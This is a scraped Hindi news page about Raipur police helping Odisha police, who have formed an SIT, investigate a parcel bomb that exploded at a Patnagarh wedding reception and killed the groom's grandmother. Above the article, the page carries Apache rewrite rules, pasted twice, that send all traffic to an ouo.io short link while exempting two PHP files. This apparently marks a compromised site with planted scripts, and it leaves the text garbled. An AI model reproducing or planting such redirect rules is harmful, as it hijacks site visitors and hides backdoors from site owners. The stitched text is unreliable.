
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 379
Previousरायपुर। ओडिशा के पाटनगढ़ में गत 23 फरवरी को हुए पार्सल बमकांड में ओडिशा की मदद करने के लिए रायपुर पुलिस आगे आई है। हालांकि आरोपी अभी पुलिस की गिरफ्त से बाहर है। अब मामले की जांच के लिए ओडिशा पुलिस ने एसआईटी का गठन किया है। आपको बता दें कि 23 फरवरी को ओडिशा के पाटनगढ़ में पार्सल बम की चपेट में आने से तीन लोंगो की जान चली गई थी। इस बम काण्ड के तार रायपुर से जुडे होने की संभावनाओं जताई जा रही थी।
गौरतलब है कि 23 फरवरी को ओडिशा के पाटनगढ़ में सौम्य शेखर साहू और रीमा साहू की रिसेप्शन पार्टी थी। उनकी शादी 18 फरवरी को हुई थी। रिसेप्शन खत्म होने के बाद साहू परिवार के सभी लोग पार्टी में मिले गिफ्ट खोल रहे थे। जब रायपुर से भेजे गए एसके शर्मा नाम के व्यक्ति का गिफ्ट खोला गया तब विस्फोट हो गया। इस बम ब्लास्ट में दूल्हे सौम्य शेखर साहू की दादी की मौके पर ही मौत हो गई। जांच को गति देने ओडिशा पुलिस ने एसआईटी का गठन किया है। फिलहाल अब तक दोंनो पुलिस को बम ब्लास्ट के ठोस सुबूत नहीं मिल सके है जिससे आरोपियों तक पहुंचा जा सके। पार्सल बम काण्ड मामले में एएसपी सिटी विजय अग्रवाल ने कहा कि रायपुर पुलिस तकनीकी रुप से ओडिशा पुलिस की सहायता कर रही है। जल्द ही आरोपियों की गिरफ्तारी होगी।